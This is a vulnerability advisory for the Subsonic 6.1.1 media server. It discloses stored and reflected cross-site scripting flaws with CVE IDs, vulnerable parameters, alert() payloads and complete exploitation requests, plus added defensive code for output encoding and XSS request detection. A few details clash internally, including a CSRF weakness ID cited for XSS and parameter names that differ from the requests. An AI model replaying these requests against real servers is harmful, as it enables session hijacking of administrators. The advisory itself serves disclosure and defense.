Subsonic 6.1.1 - Multiple Vulnerabilities


Product Description

Subsonic is an open source web media server that enables the management of media resources such as music or videos. Its official website is www.subsonic.org. The version affected by the identified vulnerabilities is 6.1.1, released May 31, 2017.

Vulnerabilities List

Two types of cross-site scripting were identified within the Subsonic application:

  • 14 stored cross-site scripting instances
  • Five reflected cross-site scripting instances

These vulnerabilities are described in the following sections.

Affected Version

Version 6.1.1

Subsonic 6.1.1 — Vulnerabilities

Stored Cross-site Scripting

The Subsonic application is affected by 14 stored cross-site scripting (XSS) instances spread across different application features. These vulnerabilities enable the injection of a JavaScript payload into a vulnerable page; the payload is then executed each time a user visits that page. The vulnerabilities can be exploited by authenticated users and used to target administrators and steal their sessions.

Vulnerability Details

CVE ID: CVE-2018-9282, CVE-2018-14688, CVE-2018-14689, CVE-2018-14690, CVE-2018-14691

Access Vector: Remote

Security Risk: Critical

Vulnerability: CWE-79

CVSS Base Score: 9.8

CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Stored XSS on Podcast Subscription Form (CVE-2018-9282)

The podcast subscription form is affected by one stored cross-site scripting instance. No administrator access is required to exploit this instance. By injecting a JavaScript payload into the form, an attacker can manipulate user sessions or elevate privileges by targeting an administrative user. The weak parameter is add. The following payload can be used to inject code and verify the vulnerability:

<script>alert(/XSS/)</script>

Figure 1 - XSS payload

The request below can be used to exploit the instances:

POST /podcastReceiverAdmin.view? HTTP/1.1
Host: HOST
Cookie: JSESSIONID=SESSIONID; DWRSESSIONID=SESSIONID2

add=http%3A%2F%2F%22%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E

Figure 2 - XSS exploitation request 
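The following is an added illustration, not Subsonic code and not part of the advisory, of the root cause behind the stored XSS instances on this page and the standard fix: contextual output encoding of stored values before they are written into HTML. The helper names (escapeHtml, renderUnsafe, renderSafe, countScriptTags) are hypothetical; the sample value is the attribute-breakout payload from Figure 2, URL-decoded.

```javascript
// Added example (not Subsonic's code): why an unencoded stored value breaks
// out of an HTML attribute, and how encoding for the HTML context stops it.
// All function names here are hypothetical choices for this illustration.

// Escape the characters that matter in HTML text and double-quoted attribute
// contexts (the OWASP minimal set plus the forward slash).
function escapeHtml(value) {
  const map = {
    "&": "&amp;",
    "<": "&lt;",
    ">": "&gt;",
    '"': "&quot;",
    "'": "&#x27;",
    "/": "&#x2F;",
  };
  return String(value).replace(/[&<>"'/]/g, (ch) => map[ch]);
}

// Vulnerable rendering: the stored podcast URL is concatenated straight into
// the form field, which is the behaviour the advisory describes for 6.1.1.
function renderUnsafe(url) {
  return `<input type="text" name="add" value="${url}">`;
}

// Hardened rendering: the same value, encoded for the attribute context.
function renderSafe(url) {
  return `<input type="text" name="add" value="${escapeHtml(url)}">`;
}

// Count the <script> start tags an HTML parser would actually see.
function countScriptTags(html) {
  return (html.match(/<script\b/gi) || []).length;
}

// Constructed sample: the decoded "add" value from Figure 2.
const SAMPLE_PAYLOAD = 'http://"><script>alert(/XSS/)</script>';

// Returns how many live script tags each rendering produces.
function demo() {
  return {
    unsafeScripts: countScriptTags(renderUnsafe(SAMPLE_PAYLOAD)), // 1
    safeScripts: countScriptTags(renderSafe(SAMPLE_PAYLOAD)),     // 0
  };
}
```

The encoder has to match the output context: the same stored value placed inside a JavaScript block or a URL attribute needs a different encoder, which is why a template engine with context-aware auto-escaping is the preferable fix over hand-placed escape calls.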

Stored XSS on Music Tags Settings Form (CVE-2018-14691)

The music tags settings form is affected by three stored XSS instances. No administrator access is required to exploit these instances, but tag modification permission is required. By injecting a JavaScript payload into the form, an attacker can manipulate user sessions or elevate privileges by targeting an administrative user. The weak parameters are c0-param2, c0-param3, and c0-param4. The following payload can be used to inject code and verify the vulnerability:

"><script>alert(/XSS/)</script>

Figure 3 - XSS payload 

The request below could be used to exploit the instances:

POST /dwr/call/plaincall/tagService.setTags.dwr HTTP/1.1
Host: 192.168.1.36:4040
Cookie: JSESSIONID=SESSIONID; DWRSESSIONID=SESSIONID2

callCount=1
nextReverseAjaxIndex=0
c0-scriptName=tagService
c0-methodName=setTags
c0-id=0
c0-param0=string:65
c0-param1=string:1
c0-param2=string:%22%3E%3Cscript%3Ealert(%2FXSS1%2F)%3C%2Fscript%3E
c0-param3=string:%22%3E%3Cscript%3Ealert(%2FXSS2%2F)%3C%2Fscript%3E
c0-param4=string:%22%3E%3Cscript%3Ealert(%2FXSS3%2F)%3C%2Fscript%3E
c0-param5=string:
c0-param6=string:Bastard%20Pop
batchId=0
instanceId=0
page=%2FeditTags.view%3Fid%3D8
scriptSessionId=SESSIONID2

Figure 4 - XSS exploitation request 

Stored XSS on Internet Radio Settings Form (CVE-2018-14688)

The internet radio settings form is affected by three stored XSS instances. Administrator access is required to exploit these instances. By injecting a JavaScript payload into the form, an attacker can manipulate user sessions. The weak parameters are name[x], streamUrl[x], and homepageUrl[x], where x is an integer. The following payload can be used to inject code and verify the vulnerability:

<script>alert(/XSS/)</script>

Figure 5 - XSS payload 

The request below could be used to exploit the instances:

POST /internetRadioSettings.view HTTP/1.1
Host: HOST
Cookie: JSESSIONID=SESSIONID; DWRSESSIONID=SESSIONID2

name%5B1%5D=%22%3Etest%22%3Cscript%3Ealert%28%2Fradioname%2F%29%3C%2Fscript%3E&streamUrl%5B1%5D=%22%3Etest%22%3Cscript%3Ealert%28%2Fradiostreamurl%2F%29%3C%2Fscript%3E&homepageUrl%5B1%5D=%22%3E%22%3Cscript%3Ealert%28%2Fradiohomepage%2F%29%3C%2Fscript%3E&enabled%5B1%5D=on&name=&streamUrl=&homepageUrl=&enabled=on

Figure 6 - XSS exploitation request

Stored XSS on General Settings Form (CVE-2018-14690)

The general settings form is affected by two stored XSS instances. Administrator access is required to exploit these instances. By injecting a JavaScript payload, an attacker can manipulate user sessions. The weak parameters are title and subtitle. The following payload can be used to inject code and verify the instances:

<script>alert(/XSS/)</script>

Figure 7 - XSS payload 

The request below could be used to exploit the instances:

POST /generalSettings.view HTTP/1.1
Host: HOST
Cookie: JSESSIONID=SESSIONID; DWRSESSIONID=SESSIONID2

musicFileTypes=mp3+ogg+oga+aac+m4a+flac+wav+wma+aif+aiff+ape+mpc+shn&videoFileTypes=flv+avi+mpg+mpeg+mp4+m4v+mkv+mov+wmv+ogv+divx+m2ts&coverArtFileTypes=cover.jpg+cover.png+cover.gif+folder.jpg+jpg+jpeg+gif+png&playlistFolder=%2Fvar%2Fplaylists&index=A+B+C+D+E+F+G+H+I+J+K+L+M+N+O+P+Q+R+S+T+U+V+W+X-Z%28XYZ%29&ignoredArticles=The+El+La+Los+Las+Le+Les&shortcuts=New+Incoming+Podcast&localeIndex=0&themeIndex=0&sortAlbumsByYear=true&_sortAlbumsByYear=on&_gettingStartedEnabled=on&welcomeTitle=Welcome+to+Subsonic%21%22%3E%3Cscript%3Ealert%28%2Fwelcometitle%2F%29%3C%2Fscript%3E&welcomeSubtitle=%22%3E%3Cscript%3Ealert%28%2Fwelcomesubtitle%2F%29%3C%2Fscript%3E&welcomeMessage=Welcome+to+Subsonic%21%0D%0A%5C%5C+%5C%5C%0D%0ASubsonic+is+a+free%2C+web-based+media+streamer%2C+providing+ubiquitous+access+to+your+music.+%0D%0A%5C%5C+%5C%5C%0D%0AUse+it+to+share+your+music+with+friends%2C+or+to+listen+to+your+own+music+while+at+work.+You+can+stream+to+multiple+players+simultaneously%2C+for+instance+to+one+player+in+your+kitchen+and+another+in+your+living+room.%0D%0A%5C%5C+%5C%5C%0D%0ATo+change+or+remove+this+message%2C+log+in+with+administrator+rights+and+go+to+%7Blink%3ASettings+%3E+General%7CgeneralSettings.view%7D.%0D%0A&loginMessage=

Figure 8 - XSS exploitation request 

Stored XSS on Transcoding Settings Form (CVE-2018-14689)

The transcoding settings form is affected by five stored XSS instances. Administrator access is required to exploit these instances. By injecting a JavaScript payload, an attacker could manipulate user sessions. The weak parameters are name[x], sourceformats[x], targetFormat[x], step1[x], and step2[x] where x is an integer. The following payload can be used to inject code and verify the instances:

<script>alert(/XSS/)</script>

Figure 9 - XSS payload

The request below could be used to exploit the instances:

POST /transcodingSettings.view HTTP/1.1
Host: HOST
Cookie: JSESSIONID=SESSIONID; DWRSESSIONID=SESSIONID2

name%5B0%5D=mp3+audio&sourceFormats%5B0%5D=ogg+oga+aac+m4a+flac+wav+wma+aif+aiff+ape+mpc+shn&targetFormat%5B0%5D=mp3&step1%5B0%5D=ffmpeg+-i+%25s+-map+0%3A0+-b%3Aa+%25bk+-v+0+-f+mp3+-&step2%5B0%5D=&name%5B1%5D=%22%3E%3Cscript%3Ealert%28%2Fname%2F%29%3C%2Fscript%3E&sourceFormats%5B1%5D=%22%3E%3Cscript%3Ealert%28%2Fconvertfrom%2F%29%3C%2Fscript%3E&targetFormat%5B1%5D=%22%3E%3Cscript%3Ealert%28%2Fconvertto%2F%29%3C%2Fscript%3E&step1%5B1%5D=%22%3E%3Cscript%3Ealert%28%2Fstep1%2F%29%3C%2Fscript%3E&step2%5B1%5D=%22%3E%3Cscript%3Ealert%28%2Fstep2%2F%29%3C%2Fscript%3E&name=&sourceFormats=&targetFormat=&step1=&step2=&defaultActive=on&downsampleCommand=ffmpeg+-i+%25s+-map+0%3A0+-b%3Aa+%25bk+-v+0+-f+mp3+-

Figure 10 - XSS exploitation request

Reflected Cross-site Scripting

The Subsonic application is affected by five reflected cross-site scripting (XSS) instances that require user interaction to be executed.

Vulnerability Details

CVE ID: CVE-2018-14687, CVE-2018-14689, CVE-2018-14692

Access Vector: Remote

Security Risk: High

Vulnerability: CWE-352

CVSS Base Score: 8.8

CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Reflected XSS Player Settings Form (CVE-2018-14687)

The personal player settings form is affected by three cross-site scripting instances. By injecting a JavaScript payload into the vulnerable parameters, an attacker could use this page to manipulate the user session. The weak parameters are clone, id, and technologyName. The following payload can be used to inject code and verify the flaw:

<script>alert(/XSS/)</script>

Figure 11 - XSS payload

The request below could be used to exploit the instances:

http://HOST/playerSettings.view?clone=%3cscript%3ealert(/XSS/)%3c%2fscript%3e

http://HOST/playerSettings.view?id=%3cscript%3ealert(/XSS/)%3c%2fscript%3e

POST /playerSettings.view HTTP/1.1
Host: HOST
Cookie: JSESSIONID=SESSIONID; DWRSESSIONID=SESSIONID2

playerId=3&technologyName=JUKEBOX%3cscript%3ealert(/XSS/)%3c%2fscript%3e&name=test&transcodeSchemeName=OFF&dynamicIp=true&_dynamicIp=on&autoControlEnabled=true&_autoControlEnabled=on&activeTranscodingIds=0&_activeTranscodingIds=on

Figure 12 - XSS exploitation requests

Reflected XSS Stream Page (CVE-2018-14692)

The stream page is affected by one cross-site scripting instance. By injecting a JavaScript payload into the vulnerable parameters, an attacker can use this page to manipulate user sessions. The weak parameter is player. The following payload can be used to inject code and verify the instance:

<script>alert(/XSS/)</script>

Figure 13 - XSS payload 

The request below could be used to exploit the instance:

http://HOST/stream?player=%3Cscript%3Ealert(/XSS/)%3C/script%3E&id=79&auth=1289324648&suffix=.mp3

Figure 14 - XSS exploitation request 

Reflected XSS Network Settings Form (CVE-2018-14694)

The network settings form is affected by one cross-site scripting instance. By injecting a JavaScript payload into the vulnerable parameter, an attacker can use this form to manipulate user sessions. The weak parameter is urlRedirectingType. The following payload can be used to inject code and verify the instance:

<script>alert(/XSS/)</script>

Figure 15 - XSS payload 

The request below can be used to exploit the instance:

POST /networkSettings.view HTTP/1.1
Host: HOST
Cookie: JSESSIONID=SESSIONID; DWRSESSIONID=SESSIONID2

_portForwardingEnabled=on&urlRedirectionEnabled=true&_urlRedirectionEnabled=on&urlRedirectType=CUSTOM%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E&urlRedirectCustomUrl=http%3A%2F%2Ftest

Figure 16 - XSS exploitation request 
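As an added defensive example, not part of the advisory and not Subsonic's code, the detection logic below URL-decodes every parameter of a request and flags values that contain script markup. It handles both request shapes shown on this page: the query-string form of the reflected instances and the newline-separated DWR body form of the tag-editing request in Figure 4. The request records are constructed from the advisory's own samples with hosts and session identifiers omitted; the function names and the pattern list are assumptions made for this example.

```javascript
// Added example, not Subsonic code: decode-then-match inspection of request
// parameters, usable in a reverse-proxy log pipeline or as a WAF rule test.
// Function names and the pattern set are hypothetical choices for this demo.

// Decode one URL-encoded token. '+' means space in form bodies. A malformed
// %-sequence is returned raw rather than dropped, so it is still inspected.
function decodeParam(token) {
  try {
    return decodeURIComponent(token.replace(/\+/g, " "));
  } catch (e) {
    return token;
  }
}

// Split a query string or form body into decoded name/value pairs.
// DWR plain calls (see the tagService request above) separate pairs with
// newlines instead of '&', so both separators are accepted.
function parseParams(text) {
  const params = [];
  for (const pair of text.split(/[&\n]/)) {
    if (pair.trim() === "") continue;
    const eq = pair.indexOf("=");
    const name = eq < 0 ? pair : pair.slice(0, eq);
    const value = eq < 0 ? "" : pair.slice(eq + 1);
    params.push({ name: decodeParam(name.trim()), value: decodeParam(value) });
  }
  return params;
}

// Matching runs on the decoded value, so %3c and %3C variants collapse to
// the same text. These are heuristic patterns; tune them per application.
const XSS_PATTERNS = [
  /<\s*script\b/i,            // script element
  /javascript\s*:/i,          // javascript: URL scheme
  /<[a-z][^>]*\son\w+\s*=/i,  // inline event handler inside a tag
];

function isSuspicious(value) {
  return XSS_PATTERNS.some((re) => re.test(value));
}

// Scan a list of {method, path, query, body} records and return findings.
function scanRequests(records) {
  const findings = [];
  for (const r of records) {
    const sources = [["query", r.query || ""], ["body", r.body || ""]];
    for (const [source, text] of sources) {
      for (const p of parseParams(text)) {
        if (isSuspicious(p.value)) {
          findings.push({ path: r.path, source, name: p.name, value: p.value });
        }
      }
    }
  }
  return findings;
}

// Constructed sample records shaped after the advisory's requests
// (hosts and session ids omitted; the third record is benign traffic).
const SAMPLE_REQUESTS = [
  { method: "GET", path: "/playerSettings.view",
    query: "clone=%3cscript%3ealert(/XSS/)%3c%2fscript%3e", body: "" },
  { method: "POST", path: "/dwr/call/plaincall/tagService.setTags.dwr", query: "",
    body: "callCount=1\nc0-scriptName=tagService\nc0-methodName=setTags\n" +
          "c0-param2=string:%22%3E%3Cscript%3Ealert(%2FXSS1%2F)%3C%2Fscript%3E\n" +
          "c0-param6=string:Bastard%20Pop" },
  { method: "GET", path: "/stream",
    query: "player=web&id=79&auth=1289324648&suffix=.mp3", body: "" },
];

// Returns the two findings (clone in the query, c0-param2 in the DWR body).
function demo() {
  return scanRequests(SAMPLE_REQUESTS);
}
```

Decoding before matching is the point of the example: a rule that inspects only the raw encoded bytes has to enumerate every encoding of the same characters, whereas normalising first keeps the rule short and consistent across the form-post, query-string, and DWR call paths that this advisory shows. The benign stream request, with its numeric id and auth values, passes through untouched.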

Disclosure Timeline: 

  • 10/5/2017: Initial discovery
  • 4/3/2018: CVEs requested 
  • 9/14/2018: Public disclosure of vulnerabilities 

Researcher:

Florian Nivette, Security Associate at Bishop Fox 


About the author, Florian Nivette

Senior Security Consultant

Florian Nivette (CEH, CHFI, CEI, GSNA) is a Bishop Fox Alumnus who was a Senior Security Consultant at Bishop Fox, where he focused on application and network penetration testing and in-depth OS-level security. Florian is an active security researcher focusing on web applications, with a number of published CVEs (CVE-2018-11349, CVE-2018-11350, CVE-2018-11351, CVE-2018-13407, CVE-2018-11408, CVE-2018-13409, CVE-2017-77737, CVE-2017-5870, and CVE-2017-6086). He is one of the chief organizers of Nuit du Hack CTF, the largest and most well-known capture-the-flag competition in France, which draws thousands of security researchers annually.
